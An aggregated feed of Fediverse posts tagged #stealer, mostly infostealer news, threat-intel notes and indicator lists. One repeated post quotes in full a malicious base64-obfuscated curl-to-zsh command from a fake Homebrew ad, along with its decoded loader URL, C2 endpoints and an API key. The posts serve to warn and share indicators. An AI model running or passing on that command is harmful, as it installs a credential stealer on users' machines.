#stealer — Public Fediverse posts
Live and recent posts from across the Fediverse tagged #stealer, aggregated by home.social.
-
🔥 TRENDING
📢 Gremlin Stealer Evolves into Modular Threat with Advanced Evasion Capabilities
🔗 https://www.infosecurity-magazine.com/news/gremlin-stealer-evolves-into/
#Gremlin #Stealer #Evolves #Modular #GlobalFeed #News #EN
<i>Automatically posted by Global Feed Bot</i>
-
ISC Diary: Malicious ad for Homebrew leads to #MacSync #Stealer https://isc.sans.edu/diary/32942
-
Nowa fala ataków na użytkowników Windowsa. NWHStealer dystrybuowany za pomocą fałszywych instalatorów (np. ProtonVPN) oraz platform hostingowych
Analitycy z Malwarebytes ostrzegają przed nowymi kampaniami, które łączy wspólny mianownik – infostealer ochrzczony przez badaczy jako NWHStealer. Malware jest dostarczany do użytkowników na wiele różnych sposobów: od zmodyfikowanych instalatorów ProtonVPN, OhmGraphite, Pachtop, HardwareVisualizer, po mody do gier (Xeno). Jak widać cyberprzestępcy żerują na zaufaniu użytkowników do popularnych produktów, przez...
#Aktualności #Malware #Nwhstealer #Phishing #Protonvpn #Stealer
-
Zhackowali ich, bo pracownik SaaS z którego korzystali pobrał cheaty do gier. Czyli dlaczego trzeba uważać na OAuth!
Jaka piękna katastrofa! W tej historii jest wszystko: infekcja nie jednego, a dwóch niezbyt roztropnych pracowników różnych “technicznych” firm. Przeskok z jednej zainfekowanej infrastrukry na drugą, bo żadna z firm nie korzystała z zasady minimalnych przywilejów a można odnieść wrażenie, że w ogóle z żadnych mechanizmów bezpieczeństwa. I wreszcie grupa atakujących, która kradnie tożsamość innej grupie oraz plujący jadem internetowi przeciwnicy vibecodingu, którzy z widłami poszli na firmę, bo przecież wiadomo, że “każdy programista AI to debil”. A okazało się, że AI nie miało z tym atakiem niczego wspólnego.
Od czego się zaczęło?
19 kwietnia na znanym hackerskim forum pojawiła się informacja o tym, że popularna wśród vibecoderów platforma Vercel została zhackowana. Atakujący podpisujący się jako ShinyHunters wystawili na sprzedaż klucze i dostępy do bazy danych firmy. Zrobiło się gorąco w środowisku, bo Vercel stoi też za narzędziem v0 oraz popularną biblioteką Next.js, a to od razu przywołało ostatnie głośne ataki supply chain.Na początku oczywiście spekulowano, że przełamanie zabezpieczeń to wynik użycia beztroskiego vibecodingu do budowy i konfiguracji mechanizmów bezpieczeństwa Vercela. Bo firma z vibecodingiem jest kojarzona. Ale prawda okazała jeszcze bardziej bolesna. Źródłem ataku był łańcuch dwóch pracowników.
Pierwszy to pracownik zewnętrznej firmy — Contex.ai, który pobierał …cheaty do gry Roblox zainfekowane infostealerem Lumma. Dzięki temu atakujący mieli dostęp do infrastruktury firmy Contex.ai oraz danych jej klientów. Dwa miesiące [...]
#AI #EskalacjaPrzywilejów #GoogleWorkspace #Infostealer #Malware #SaaS #Stealer #Vercel
-
https://www.europesays.com/at/83004/ SparkCat und Venom Stealer: Neue Malware-Welle bedroht Krypto-Wallets #AT #Austria #KryptoWallets #Kryptowährungen #MalwareWelle #Österreich #Schadsoftware #Science #Science&Technology #Sicherheitsexperten #Smartphones #SparkCat #Stealer #Technik #Technology #venom #Welle #Wissenschaft #Wissenschaft&Technik
-
A more sane and parseable list of indicators:
Landing page
httpX://macdev.slab[.]com/public/posts/insta-іі-with-termina-і-g40n4aau?shr=6etwxr0gksp2ltctcqv7gom7Loaders
httpX://datasphere.us[.]com/debug/loader.sh?build=492f9e58358e8e2bc9e0414fa077e197
https://datasphere.us.com/debug/payload.applescript?build=492f9e58358e8e2bc9e0414fa077e197Mocked User Agent for curls
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36APIs
httpX://datasphere.us[.]com/api/debug/event # initial info gathering
httpX://datasphere.us[.]com/gate # stealer upload location
httpX://datasphere.us[.]com/gate/chunk # large file uploads
httpX://datasphere.us[.]com/api/bot/heartbeat # Persistence heartbeat APIapi key
61cb9c3bd1a2faa7d6613dd8e5d09e79fe95e85ab09ed6bcd6406badff5a083f -
Absolute state of google, (and frankly the expectations of developers for installing things).
Setting up an older Mac to use as a new work machine, search google for
brew Maclooking for the brew.sh site, first result is a sponsored link tohttpX://macdev.slab[.]com/public/posts/insta-іі-with-termina-і-g40n4aau?shr=6etwxr0gksp2ltctcqv7gom7. I know it's not right but I got curious, let's see what's inside.First link is familiar install instructions as we're used to for brew "here copy paste this code into terminal, don't ask questions". * Don't actually do this *
echo "Downloading Update: https://support.apple.com/downloads/xprotect-remediator-150.dmg" && curl -s $(echo "aHR0cHM6Ly9kYXRhc3BoZXJlLnVzLmNvbS9kZWJ1Zy9sb2FkZXIuc2g/YnVpbGQ9NDkyZjllNTgzNThlOGUyYmM5ZTA0MTRmYTA3N2UxOTc=" | base64 -d) | zshAww man that base64 makes me feel good and trusting, wonder what's inside
echo 'aHR0cHM6Ly9kYXRhc3BoZXJlLnVzLmNvbS9kZWJ1Zy9sb2FkZXIuc2g/YnVpbGQ9NDkyZjllNTgzNThlOGUyYmM5ZTA0MTRmYTA3N2UxOTc=' | base64 -d | cat
httpX://datasphere.us[.]com/debug/loader.sh?build=492f9e58358e8e2bc9e0414fa077e197hrmm, that's not brew, oh well maybe this is fine, let's check it out with urlscan, looks like me and 5 of my closest friends have had the same idea
https://urlscan.io/result/019d298d-3b24-7571-a37a-12575ae1eb84/Another base64 blob, that truly gives me the warm and fuzzies, I'm starting to think maybe it's not brew https://pastebin.com/5cr5Nh1W
VirusTotal thinks this new blob might be a stealer https://www.virustotal.com/gui/file/54043cd8874e0eabbced73e433cfa30c75fd45364ae4f03fbda2eabca9d8d994?nocache=1This blob grabs some basic info then pulls an osa script which appears to be the friends we made along the way (stealer)
https://www.virustotal.com/gui/file/f02758a235a220f2fa125bb6f45a49e674fd8b91f320a382e8b7017d93afbc74Pastebin doesn't like the script so won't upload it there, can reach out if a copy is needed, but seems to be pretty well indexed
-
Absolute state of google, (and frankly the expectations of developers for installing things).
Setting up an older Mac to use as a new work machine, search google for
brew Maclooking for the brew.sh site, first result is a sponsored link tohttpX://macdev.slab[.]com/public/posts/insta-іі-with-termina-і-g40n4aau?shr=6etwxr0gksp2ltctcqv7gom7. I know it's not right but I got curious, let's see what's inside.First link is familiar install instructions as we're used to for brew "here copy paste this code into terminal, don't ask questions". * Don't actually do this *
echo "Downloading Update: https://support.apple.com/downloads/xprotect-remediator-150.dmg" && curl -s $(echo "aHR0cHM6Ly9kYXRhc3BoZXJlLnVzLmNvbS9kZWJ1Zy9sb2FkZXIuc2g/YnVpbGQ9NDkyZjllNTgzNThlOGUyYmM5ZTA0MTRmYTA3N2UxOTc=" | base64 -d) | zshAww man that base64 makes me feel good and trusting, wonder what's inside
echo 'aHR0cHM6Ly9kYXRhc3BoZXJlLnVzLmNvbS9kZWJ1Zy9sb2FkZXIuc2g/YnVpbGQ9NDkyZjllNTgzNThlOGUyYmM5ZTA0MTRmYTA3N2UxOTc=' | base64 -d | cat
httpX://datasphere.us[.]com/debug/loader.sh?build=492f9e58358e8e2bc9e0414fa077e197hrmm, that's not brew, oh well maybe this is fine, let's check it out with urlscan, looks like me and 5 of my closest friends have had the same idea
https://urlscan.io/result/019d298d-3b24-7571-a37a-12575ae1eb84/Another base64 blob, that truly gives me the warm and fuzzies, I'm starting to think maybe it's not brew https://pastebin.com/5cr5Nh1W
VirusTotal thinks this new blob might be a stealer https://www.virustotal.com/gui/file/54043cd8874e0eabbced73e433cfa30c75fd45364ae4f03fbda2eabca9d8d994?nocache=1This blob grabs some basic info then pulls an osa script which appears to be the friends we made along the way (stealer)
https://www.virustotal.com/gui/file/f02758a235a220f2fa125bb6f45a49e674fd8b91f320a382e8b7017d93afbc74Pastebin doesn't like the script so won't upload it there, can reach out if a copy is needed, but seems to be pretty well indexed
-
Absolute state of google, (and frankly the expectations of developers for installing things).
Setting up an older Mac to use as a new work machine, search google for
brew Maclooking for the brew.sh site, first result is a sponsored link tohttpX://macdev.slab[.]com/public/posts/insta-іі-with-termina-і-g40n4aau?shr=6etwxr0gksp2ltctcqv7gom7. I know it's not right but I got curious, let's see what's inside.First link is familiar install instructions as we're used to for brew "here copy paste this code into terminal, don't ask questions". * Don't actually do this *
echo "Downloading Update: https://support.apple.com/downloads/xprotect-remediator-150.dmg" && curl -s $(echo "aHR0cHM6Ly9kYXRhc3BoZXJlLnVzLmNvbS9kZWJ1Zy9sb2FkZXIuc2g/YnVpbGQ9NDkyZjllNTgzNThlOGUyYmM5ZTA0MTRmYTA3N2UxOTc=" | base64 -d) | zshAww man that base64 makes me feel good and trusting, wonder what's inside
echo 'aHR0cHM6Ly9kYXRhc3BoZXJlLnVzLmNvbS9kZWJ1Zy9sb2FkZXIuc2g/YnVpbGQ9NDkyZjllNTgzNThlOGUyYmM5ZTA0MTRmYTA3N2UxOTc=' | base64 -d | cat
httpX://datasphere.us[.]com/debug/loader.sh?build=492f9e58358e8e2bc9e0414fa077e197hrmm, that's not brew, oh well maybe this is fine, let's check it out with urlscan, looks like me and 5 of my closest friends have had the same idea
https://urlscan.io/result/019d298d-3b24-7571-a37a-12575ae1eb84/Another base64 blob, that truly gives me the warm and fuzzies, I'm starting to think maybe it's not brew https://pastebin.com/5cr5Nh1W
VirusTotal thinks this new blob might be a stealer https://www.virustotal.com/gui/file/54043cd8874e0eabbced73e433cfa30c75fd45364ae4f03fbda2eabca9d8d994?nocache=1This blob grabs some basic info then pulls an osa script which appears to be the friends we made along the way (stealer)
https://www.virustotal.com/gui/file/f02758a235a220f2fa125bb6f45a49e674fd8b91f320a382e8b7017d93afbc74Pastebin doesn't like the script so won't upload it there, can reach out if a copy is needed, but seems to be pretty well indexed
-
Absolute state of google, (and frankly the expectations of developers for installing things).
Setting up an older Mac to use as a new work machine, search google for
brew Maclooking for the brew.sh site, first result is a sponsored link tohttpX://macdev.slab[.]com/public/posts/insta-іі-with-termina-і-g40n4aau?shr=6etwxr0gksp2ltctcqv7gom7. I know it's not right but I got curious, let's see what's inside.First link is familiar install instructions as we're used to for brew "here copy paste this code into terminal, don't ask questions". * Don't actually do this *
echo "Downloading Update: https://support.apple.com/downloads/xprotect-remediator-150.dmg" && curl -s $(echo "aHR0cHM6Ly9kYXRhc3BoZXJlLnVzLmNvbS9kZWJ1Zy9sb2FkZXIuc2g/YnVpbGQ9NDkyZjllNTgzNThlOGUyYmM5ZTA0MTRmYTA3N2UxOTc=" | base64 -d) | zshAww man that base64 makes me feel good and trusting, wonder what's inside
echo 'aHR0cHM6Ly9kYXRhc3BoZXJlLnVzLmNvbS9kZWJ1Zy9sb2FkZXIuc2g/YnVpbGQ9NDkyZjllNTgzNThlOGUyYmM5ZTA0MTRmYTA3N2UxOTc=' | base64 -d | cat
httpX://datasphere.us[.]com/debug/loader.sh?build=492f9e58358e8e2bc9e0414fa077e197hrmm, that's not brew, oh well maybe this is fine, let's check it out with urlscan, looks like me and 5 of my closest friends have had the same idea
https://urlscan.io/result/019d298d-3b24-7571-a37a-12575ae1eb84/Another base64 blob, that truly gives me the warm and fuzzies, I'm starting to think maybe it's not brew https://pastebin.com/5cr5Nh1W
VirusTotal thinks this new blob might be a stealer https://www.virustotal.com/gui/file/54043cd8874e0eabbced73e433cfa30c75fd45364ae4f03fbda2eabca9d8d994?nocache=1This blob grabs some basic info then pulls an osa script which appears to be the friends we made along the way (stealer)
https://www.virustotal.com/gui/file/f02758a235a220f2fa125bb6f45a49e674fd8b91f320a382e8b7017d93afbc74Pastebin doesn't like the script so won't upload it there, can reach out if a copy is needed, but seems to be pretty well indexed
-
Вредоносное ПО Mamont снова атакует РФ
Троян Mamont продолжает вести свою вредоносную деятельность, направленную на пользователей Android-смартфонов. В ходе отслеживания активности семейств вредоносных программ для операционных систем Android эксперты отдела исследований киберугроз «Перспективного мониторинга» обнаружили вариацию вредоносного ПО Mamont с названием Фото(92).apk , датированную 2026 годом. В ходе тщательного анализа этого образца была выявлена новая панель управления C&C — fensteadom[.]com.
https://habr.com/ru/companies/pm/articles/993182/
#вредоносное_по #android #stealer #mamont #мошенники_в_интернете #telegram
-
When you finally reverse the loader for that malware sample #VirusTotal flagged as "APT XYZ". and it turns out to be just a #Vidar #Stealer dropper.
4 Stages including Steganography for nothing 😕 -
Malware atakujący Discord oraz popularne przeglądarki internetowe – szczegółowa analiza VVS Stealer
Badacze z Unit42 (Palo Alto Networks) opublikowali szczegółową analizę nowego zagrożenia jakim jest VVS Stealer (znany również pod nazwą VVS $tealer). Tym razem atakujący obrali za cel użytkowników platformy Discord. Malware, napisany w Pythonie oraz zaciemniony z wykorzystaniem komercyjnego narzędzia Pyarmor jest dystrybuowany za pomocą tejże platformy oraz sprzedawany za...
-
2026-01-01 (Thursday): #LummaStealer infection with follow-up malware.
A #pcap of the infection traffic, the #Lumma #Stealer files, and a list of IOCs are available at https://www.malware-traffic-analysis.net/2026/01/01/index.html
Lumma Stealer C2 domain: offenms[.]cyou
The follow-up malware is using memory-scanner[.]cc for its C2 traffic, just like I saw on 2025-12-30. But this follow-up malware also used another C2 domain: communicationfirewall-security[.]cc
-
@jack_daniel this isn't new, what is new is we think it is other people's problem when the insatiable demand continues and won't be solved or mitigated. the drug war is just to keep the local gun club running and 'in control'. woke lib people think legalization and rehab plus education could be the only way out - they actually could be right, instead we will keep doing things the old way and failing, this is not a bug it is a feature of the entire power structure, politically and socioeconomically. legalization sounds bad but at least you keep the money here and not funneling billions through a sewer in juarez, somthing to think about, that is a hell of a lot of taxes #change my mind #george willpower #stealer's wheel #meth tariff
-
Fake Doom WADs that are actually malware hosted on SourceForge almost got my friend.
Please be careful downloading mods as a streamer!
#Doom #WAD #SourceForge #Malware #VTuber #ReverseEngineering #Stealer
https://urlscan.io/result/019b5efd-425a-721d-8907-127af9a23a56/
https://app.any.run/tasks/200a705f-e106-46d7-9773-607899046b3d
Command and control:
https://www.virustotal.com/gui/url/db81a7895c26016a19106ca3442417e18823eb7892464a1c6735eda33df88a6ahttps://urlscan.io/result/019b6790-5571-71a5-a4f8-607eef7bae0f/
-
Fake Doom WADs that are actually malware hosted on SourceForge almost got my friend.
Please be careful downloading mods as a streamer!
#Doom #WAD #SourceForge #Malware #VTuber #ReverseEngineering #Stealer
https://urlscan.io/result/019b5efd-425a-721d-8907-127af9a23a56/
https://app.any.run/tasks/200a705f-e106-46d7-9773-607899046b3d
Command and control:
https://www.virustotal.com/gui/url/db81a7895c26016a19106ca3442417e18823eb7892464a1c6735eda33df88a6ahttps://urlscan.io/result/019b6790-5571-71a5-a4f8-607eef7bae0f/
-
Fake Doom WADs that are actually malware hosted on SourceForge almost got my friend.
Please be careful downloading mods as a streamer!
#Doom #WAD #SourceForge #Malware #VTuber #ReverseEngineering #Stealer
https://urlscan.io/result/019b5efd-425a-721d-8907-127af9a23a56/
https://app.any.run/tasks/200a705f-e106-46d7-9773-607899046b3d
Command and control:
https://www.virustotal.com/gui/url/db81a7895c26016a19106ca3442417e18823eb7892464a1c6735eda33df88a6ahttps://urlscan.io/result/019b6790-5571-71a5-a4f8-607eef7bae0f/
-
Fake Doom WADs that are actually malware hosted on SourceForge almost got my friend.
Please be careful downloading mods as a streamer!
#Doom #WAD #SourceForge #Malware #VTuber #ReverseEngineering #Stealer
https://urlscan.io/result/019b5efd-425a-721d-8907-127af9a23a56/
https://app.any.run/tasks/200a705f-e106-46d7-9773-607899046b3d
Command and control:
https://www.virustotal.com/gui/url/db81a7895c26016a19106ca3442417e18823eb7892464a1c6735eda33df88a6ahttps://urlscan.io/result/019b6790-5571-71a5-a4f8-607eef7bae0f/
-
Fake Doom WADs that are actually malware hosted on SourceForge almost got my friend.
Please be careful downloading mods as a streamer!
#Doom #WAD #SourceForge #Malware #VTuber #ReverseEngineering #Stealer
https://urlscan.io/result/019b5efd-425a-721d-8907-127af9a23a56/
https://app.any.run/tasks/200a705f-e106-46d7-9773-607899046b3d
Command and control:
https://www.virustotal.com/gui/url/db81a7895c26016a19106ca3442417e18823eb7892464a1c6735eda33df88a6ahttps://urlscan.io/result/019b6790-5571-71a5-a4f8-607eef7bae0f/
-
Анализируем вредоносное ПО на примере семпла от группировки BO Team: подробный мануал для начинающих
Хабр, всем привет! На связи Никита Полосухин, ведущий аналитик центра мониторинга и реагирования на кибератаки RED Security SOC. Сегодня мы разберем loader от группировки BO Team. Материал предназначен для начинающих ИБ-специалистов и представляет собой краткий мануал, который поясняет, как быстро определить функциональность вредоносного ПО, достать из семпла индикаторы и какие инструменты можно использовать для анализа.
https://habr.com/ru/companies/ru_mts/articles/980374/
#BO_Team #RED_Security #анализ_вредоносного_ПО #реверсинжиниринг #Кибербезопасность #Loader #Stealer #анализ_памяти #статический_анализ #динамический_анализ
-
2025-12-23 (Tuesday): Based on yesterday's Jamf article, I downloaded the fake installer for #MacSyncStealer from zkcall[.]net and ran it on a macOS host in my lab.
A #pcap of the #MacSync #Stealer traffic, the associated IOCs, the #malware sample, and a link to the Jamf article are at www.malware-traffic-analysis.net/2025/12/23/index.html
Of note, the zkcall[.]net download page also has a link for a Windows download. The downloaded EXE file appears to be #DonutLoader, based on one of the follow-up EXE files it retrieved and ran: https://app.any.run/tasks/afd3ae74-2976-492b-a3c0-6e19e9127f68
-
[AKTUALIZACJA] Przejęli mu konto, ale pomoc techniczna Google nie chce mu pomóc
Co może się stać, kiedy ktoś przejmie Wasze konto Google? Dużo. Strasznych. Rzeczy. Czy można takie konto odzyskać? Niby można, ale przypadek Mateusza pokazuje, że …nie można. I to pomimo nawiązania kontaktu z pomocą techniczną Google i pomimo posiadania wielu dowodów na to, że przejęte konto do Mateusza należy.
Oto jedna z najbardziej kuriozalnych historii, jaką ostatnio widzieliśmy. Istny cyfrowy paragraf 22. Zobaczcie jak Mateusz wpadł w czarną dziurę i uświadomcie sobie, jak niewiele znaczycie dla firm takich jak Google, pomimo tego, że przez lata płacicie im za różne usługi. Artykuł doczytajcie do końca, tam informujemy co warto zrobić, aby nie ponieść takich strat, jakie poniósł Mateusz w wyniku pewnej luki w procesach Google.
Kolega podesłał mi linka, w którego kliknąłem…
Historia Mateusza zaczyna się 25 września, kiedy odzywa się do niego znajomy na Discordzie. Znajomy przesła mu linka do strony https://vampirk-beta.netlify[.]app a Mateusz pobiera z niej plik .exe (MD5: 1E7997DFEF983BE219D95A1842FEE298) myśląc że to gra o której rozmawiają. I “grę” tę uruchamia. A robi to dlatego, że pracuje w branży gier komputerowych i takie prośby od znajomych nie były dla niego niczym niecodziennym.Problem w tym, że konto znajomego, który do Mateusza napisał zostało wcześniej przejęte przez atakującego, a pobrana gra okazała się trojanem…
Efekt? Atakujący przejmuje konta Mateusza, zarówno to na Discordzie jak również inne — w tym niestety konto Google. Ale najwyraźniej kradnie tylko ciasteczka i samo “wejście w sesję Mateusza” nie daje mu możliwości przejęcia pełnej kontroli nad kontem zapewne przez brak hasła, więc robi coś bardzo sprytnego:
Włamywacz prosi mnie [...]#Ataki #Discord #GMail #Google #Malware #PomocTechniczna #Stealer #Support
https://niebezpiecznik.pl/post/przejete-konto-google-gmail-jak-odzyskac-pomoc-suport-kontakt/
-
Gra na Steamie okradła streamera chorego na raka
BlockBlasters to retro-stylizowana dwuwymiarowa platformówka obiecująca dynamiczną akcję oraz responsywne sterowanie. Była zweryfikowana i dostępna na Steamie za darmo przez prawie dwa miesiące – od 30 lipca do 21 września br. i przez ten czas zdążyła zebrać kilkaset pozytywnych ocen od społeczności. Według badaczy gra przestała być bezpieczna 30 sierpnia,...
#WBiegu #Blockblasters #Crypto #Stealer #Steam
https://sekurak.pl/gra-na-steamie-okradla-streamera-chorego-na-raka/
-
Coyote Banking Trojan First to Abuse Microsoft UIA https://www.securityweek.com/coyote-banking-trojan-first-to-abuse-microsoft-uia/ #Malware&Threats #bankingtrojan #MicrosoftUIA #malware #stealer #Coyote
-
Coyote Banking Trojan First to Abuse Microsoft UIA https://www.securityweek.com/coyote-banking-trojan-first-to-abuse-microsoft-uia/ #Malware&Threats #bankingtrojan #MicrosoftUIA #malware #stealer #Coyote
-
The website of the "Deutsche Vereinigung für internationales Recht" (dvir[.]de) is currently compromised and spreading #Lumma #Stealer via #FakeCaptcha attack.
Compromised webfile is:
hxxp[://]www[.]dvir[.]de/wp-content/themes/Dummy/assets/js/main[.]min[.]js?ver=1[.]0 -
🚨 Valve’s Steam game platform was exploited to push malware—twice in 2 months. 👀
Valve has removed “Sniper: Phantom’s Resolution” from Steam. Last month it banned “PirateFi”—both reportedly contained infostealer malware.
Read @theJoshMeister’s report: https://www.intego.com/mac-security-blog/steam-game-store-exploited-to-push-malware-twice-in-2-months/
#malware #steamgame #steamstorepage #infostealer #stealer #gaming #gamingnews #malwareprotection #antivirus #videogamenews #gamenews #steam #cybersecurity #cybersecuritynews #infosec #securitynews #informationsecurity #malwarealert
-
Threat Actor Claims to Possess 10GB of Stolen Login Credentials https://dailydarkweb.net/threat-actor-claims-to-possess-10gb-of-stolen-login-credentials/ #DataBreaches #StealerLogs #credential #government #stealerlog #defense #stealer
-
Mastodon communities, be vigilant! Bad actors are creating accounts within the Fediverse and then using them to distribute malware. We identified one such case in which the threat actor had gone undetected since 2022. That Mastodon instance was one with a climate change focus. The threat actor was distributing an information stealer through their account.
We are happy to have helped the instance owner figure out why they have been on blocklists intermittently for the last few years, but also get that particular threat out of their Mastodon instance and safe for users.
There are undoubtedly many more of these across the Fediverse. Hopefully more awareness can get them detected and shut down faster.
For our fellow security nerds... this was #vidar malware with sha256 975932eeda7cc3feea07bc1f8576e1e73e4e001c6fe477c8df7272ee2e0ba20d
and a c2 IP 78[.]47[.]227[.]68 from the instance.
there is still at least one more Mastodon instance impacted that we are trying to reach.
#malware #stealer #mastodon #threatintel #cybercrime #threatintelligence #cybersecurity #infosec #infoblox #infobloxthreatintel #fakeaccounts #c2 -
Game Over: Разбираем стилер, атакующий геймеров
Собрать после работы друзей в Discord* и откатать пару каточек в Dota2 или CS2 — идеально. Если вы являетесь счастливым владельцем скина на АК-47 «Поверхностная закалка» с паттерном 661 (стоимостью от $1 млн), керамбита Doppler Ruby (стоимость от $8 тыс.) или другого крутого цифрового актива, то, скорее всего, не хотите, чтобы их украли. Кража скинов в CS — это, конечно, очень редкий случай, но что если кто-нибудь получит доступ к вашему Discord*, Telegram или вообще всем паролям в браузере? Конечно, пополнять своими данными списки и без того масштабных утечек не хочется, но при чем здесь онлайн-игры? Дело в том, что существует вредоносное программное обеспечение, которое нацелено именно на игровое комьюнити. ВПО распространяется через Discord*, фейковые обновления в Steam или через фейковые сайты с ранним доступом к популярным играм. Под катом препарируем Epsilon Stealer: разбираем, как он работает, как распространяется, чем опасен, а главное — как найти и выявить его работу.
https://habr.com/ru/companies/jetinfosystems/articles/874224/
#epsilon #stealer #вредоносное_по #cybersecurity #кража_данных #фишинг #гейминг #cyberattack
-
Nowy sposób na kradzież danych z systemów Windows – malware via RDP, kampania rosyjskiej grupy APT29
Rosyjska grupa APT „Midnight Blizzard” wykorzystuje pliki .rdp w kampanii malware, która umożliwia kradzież danych z dysków użytkowników oraz dystrybucję złośliwego oprogramowania w sieci ofiary. Atak polega na oszukaniu użytkownika, aby otworzył spreparowany plik .rdp, co skutkuje kradzieżą danych i potencjalnym zainfekowaniem innych urządzeń. Nasi pentesterzy natrafili na ślady tej...
-
Law Enforcement Puts a Damning Dent in RedLine and Meta Infostealer Operations https://thecyberexpress.com/operation-magnus-redline-and-meta-infostealer/ #RedlineandMetaInfostealer #TheCyberExpressNews #RedlineInfostealer #CyberEssentials #MetaInfostealer #OperationMagnus #TheCyberExpress #RedLineStealer #FirewallDaily #ThreatActors #MalwareNews #DutchPolice #infostealer #METAstealer #CyberNews #Europol #Stealer #AFP #FBI
-
Hey there! I stumbled upon a fresh sample of Formbook info-stealer malware. During analysis I found this malware hides its payload into a vulnerable WordPress website.
Read the article to know more.
#FormBook #Stealer #MalwareAnalysis #MalwareResearch #CTI #ThreatIntel #InfoSec https://ashishranax.github.io/posts/FormBook-Malware-The-Uninvited-Guest-of-WordPress/ -
⚠️Rutger Stealer⚠️Threat actor, sup3rm5n, is allegedly selling Rutger Stealer. It steals various types of data such as credit card info, Chromium cookies, Discord, Telegram, Cold wallets, Logins and passwords.
#CTI #DarkWeb #DarkWebInformer #Cybercrime #Cybersecurity #Rutger #Stealer
X Link: https://twitter.com/DarkWebInformer/status/1786821306047926753
-
A Full Analysis of the Pure #malware_removal Family: Unique and Growing Threat
The folks at ANY.RUN have posted an analysis of the PURE of the #crypter and multifunctional #stealer malware. While advertised as educational software, Malware Bazaar's database has too many listings to support this claim. Check out https://bazaar.abuse.ch/browse.php?search=tag%3ApureCrypter
PURE is purchased via a website and telegram bots often involving Bitcoin. PureCrypter's behavior flow is typical of loader or staged loader malware. They also examine PureLogs and PureMiner. All family members exhibit malicious code behaviors.
Kudos to the ANY.RUN folks for presenting a deeply technical analysis in an excellent narrative.
-
One clever tactic used by the attackers involves deleting the stolen cookies after extracting them. This effectively logs the victims out of their own accounts.
-
Rhadamanthys Stealer has it's own web, I had missed that completely.
Yet another sign that the Stealer market is growing, maturing and getting increasingly professional and an important part of the ecosystem.
-
#Rhadamanthys #stealer seems to be having a moment right now. Quick rundown on what we know about infection trends & its post-exploit TTPs
Discovered last summer, it's one of several popular & emerging #infostealer #malware with new/improved evasion and/or theft capabilities observed in recent months. Like many popular families, Rhadamanthys initial infections occur via multiple vectors, including #phishing & #spam email attachments and - increasingly - legitimate web search ads: https://www.malware-traffic-analysis.net/2023/01/03/index.html, https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/
In our broad analysis of the infostealer threat landscape, we identified #mitreattack TTPs associated with 16 families across dozens of public reports. We've already added more reported techniques to Rhadamanthys' set since the report dropped this week https://www.tidalcyber.com/blog/big-game-stealing-part-1-the-infostealer-landscape-rising-infostealer-threats-to-businesses-w
Still somewhat limited public reporting on this threat to date, although we've identified 22 (sub-)techniques associated with Rhadamanthys so far. Visualize them and pivot to associated defensive & offensive testing capabilities here: https://app.tidalcyber.com/share/techniqueset/48405ee2-b243-4bda-a6c2-75eb80869056
In addition to the reports above, two other resources here: https://www.accenture.com/us-en/blogs/security/information-stealer-malware-on-dark-web, https://threatmon.io/rhadamanthys-stealer-analysis-threatmon/. Thanks to the teams that published great reporting & analysis around Rhadamanthys so far, including ThreatMon Accenture @malware_traffic & Cyble
-
Raccolti dal Dark Web oltre 6mila credenziali di accesso rubate mediante il malware #Stealer e relative ad account collegati a 41 portali istituzionali italiani. Possibile compromissione di password sia di semplici cittadini sia di dipendenti pubblici. Ecco la nostra analisi di quanto successo
Di Dario #Fadda su #Cybersecurity360
https://www.cybersecurity360.it/nuove-minacce/data-leak-di-credenziali-della-pa-italiana-seimila-password-violate-il-rischio-e-elevato/
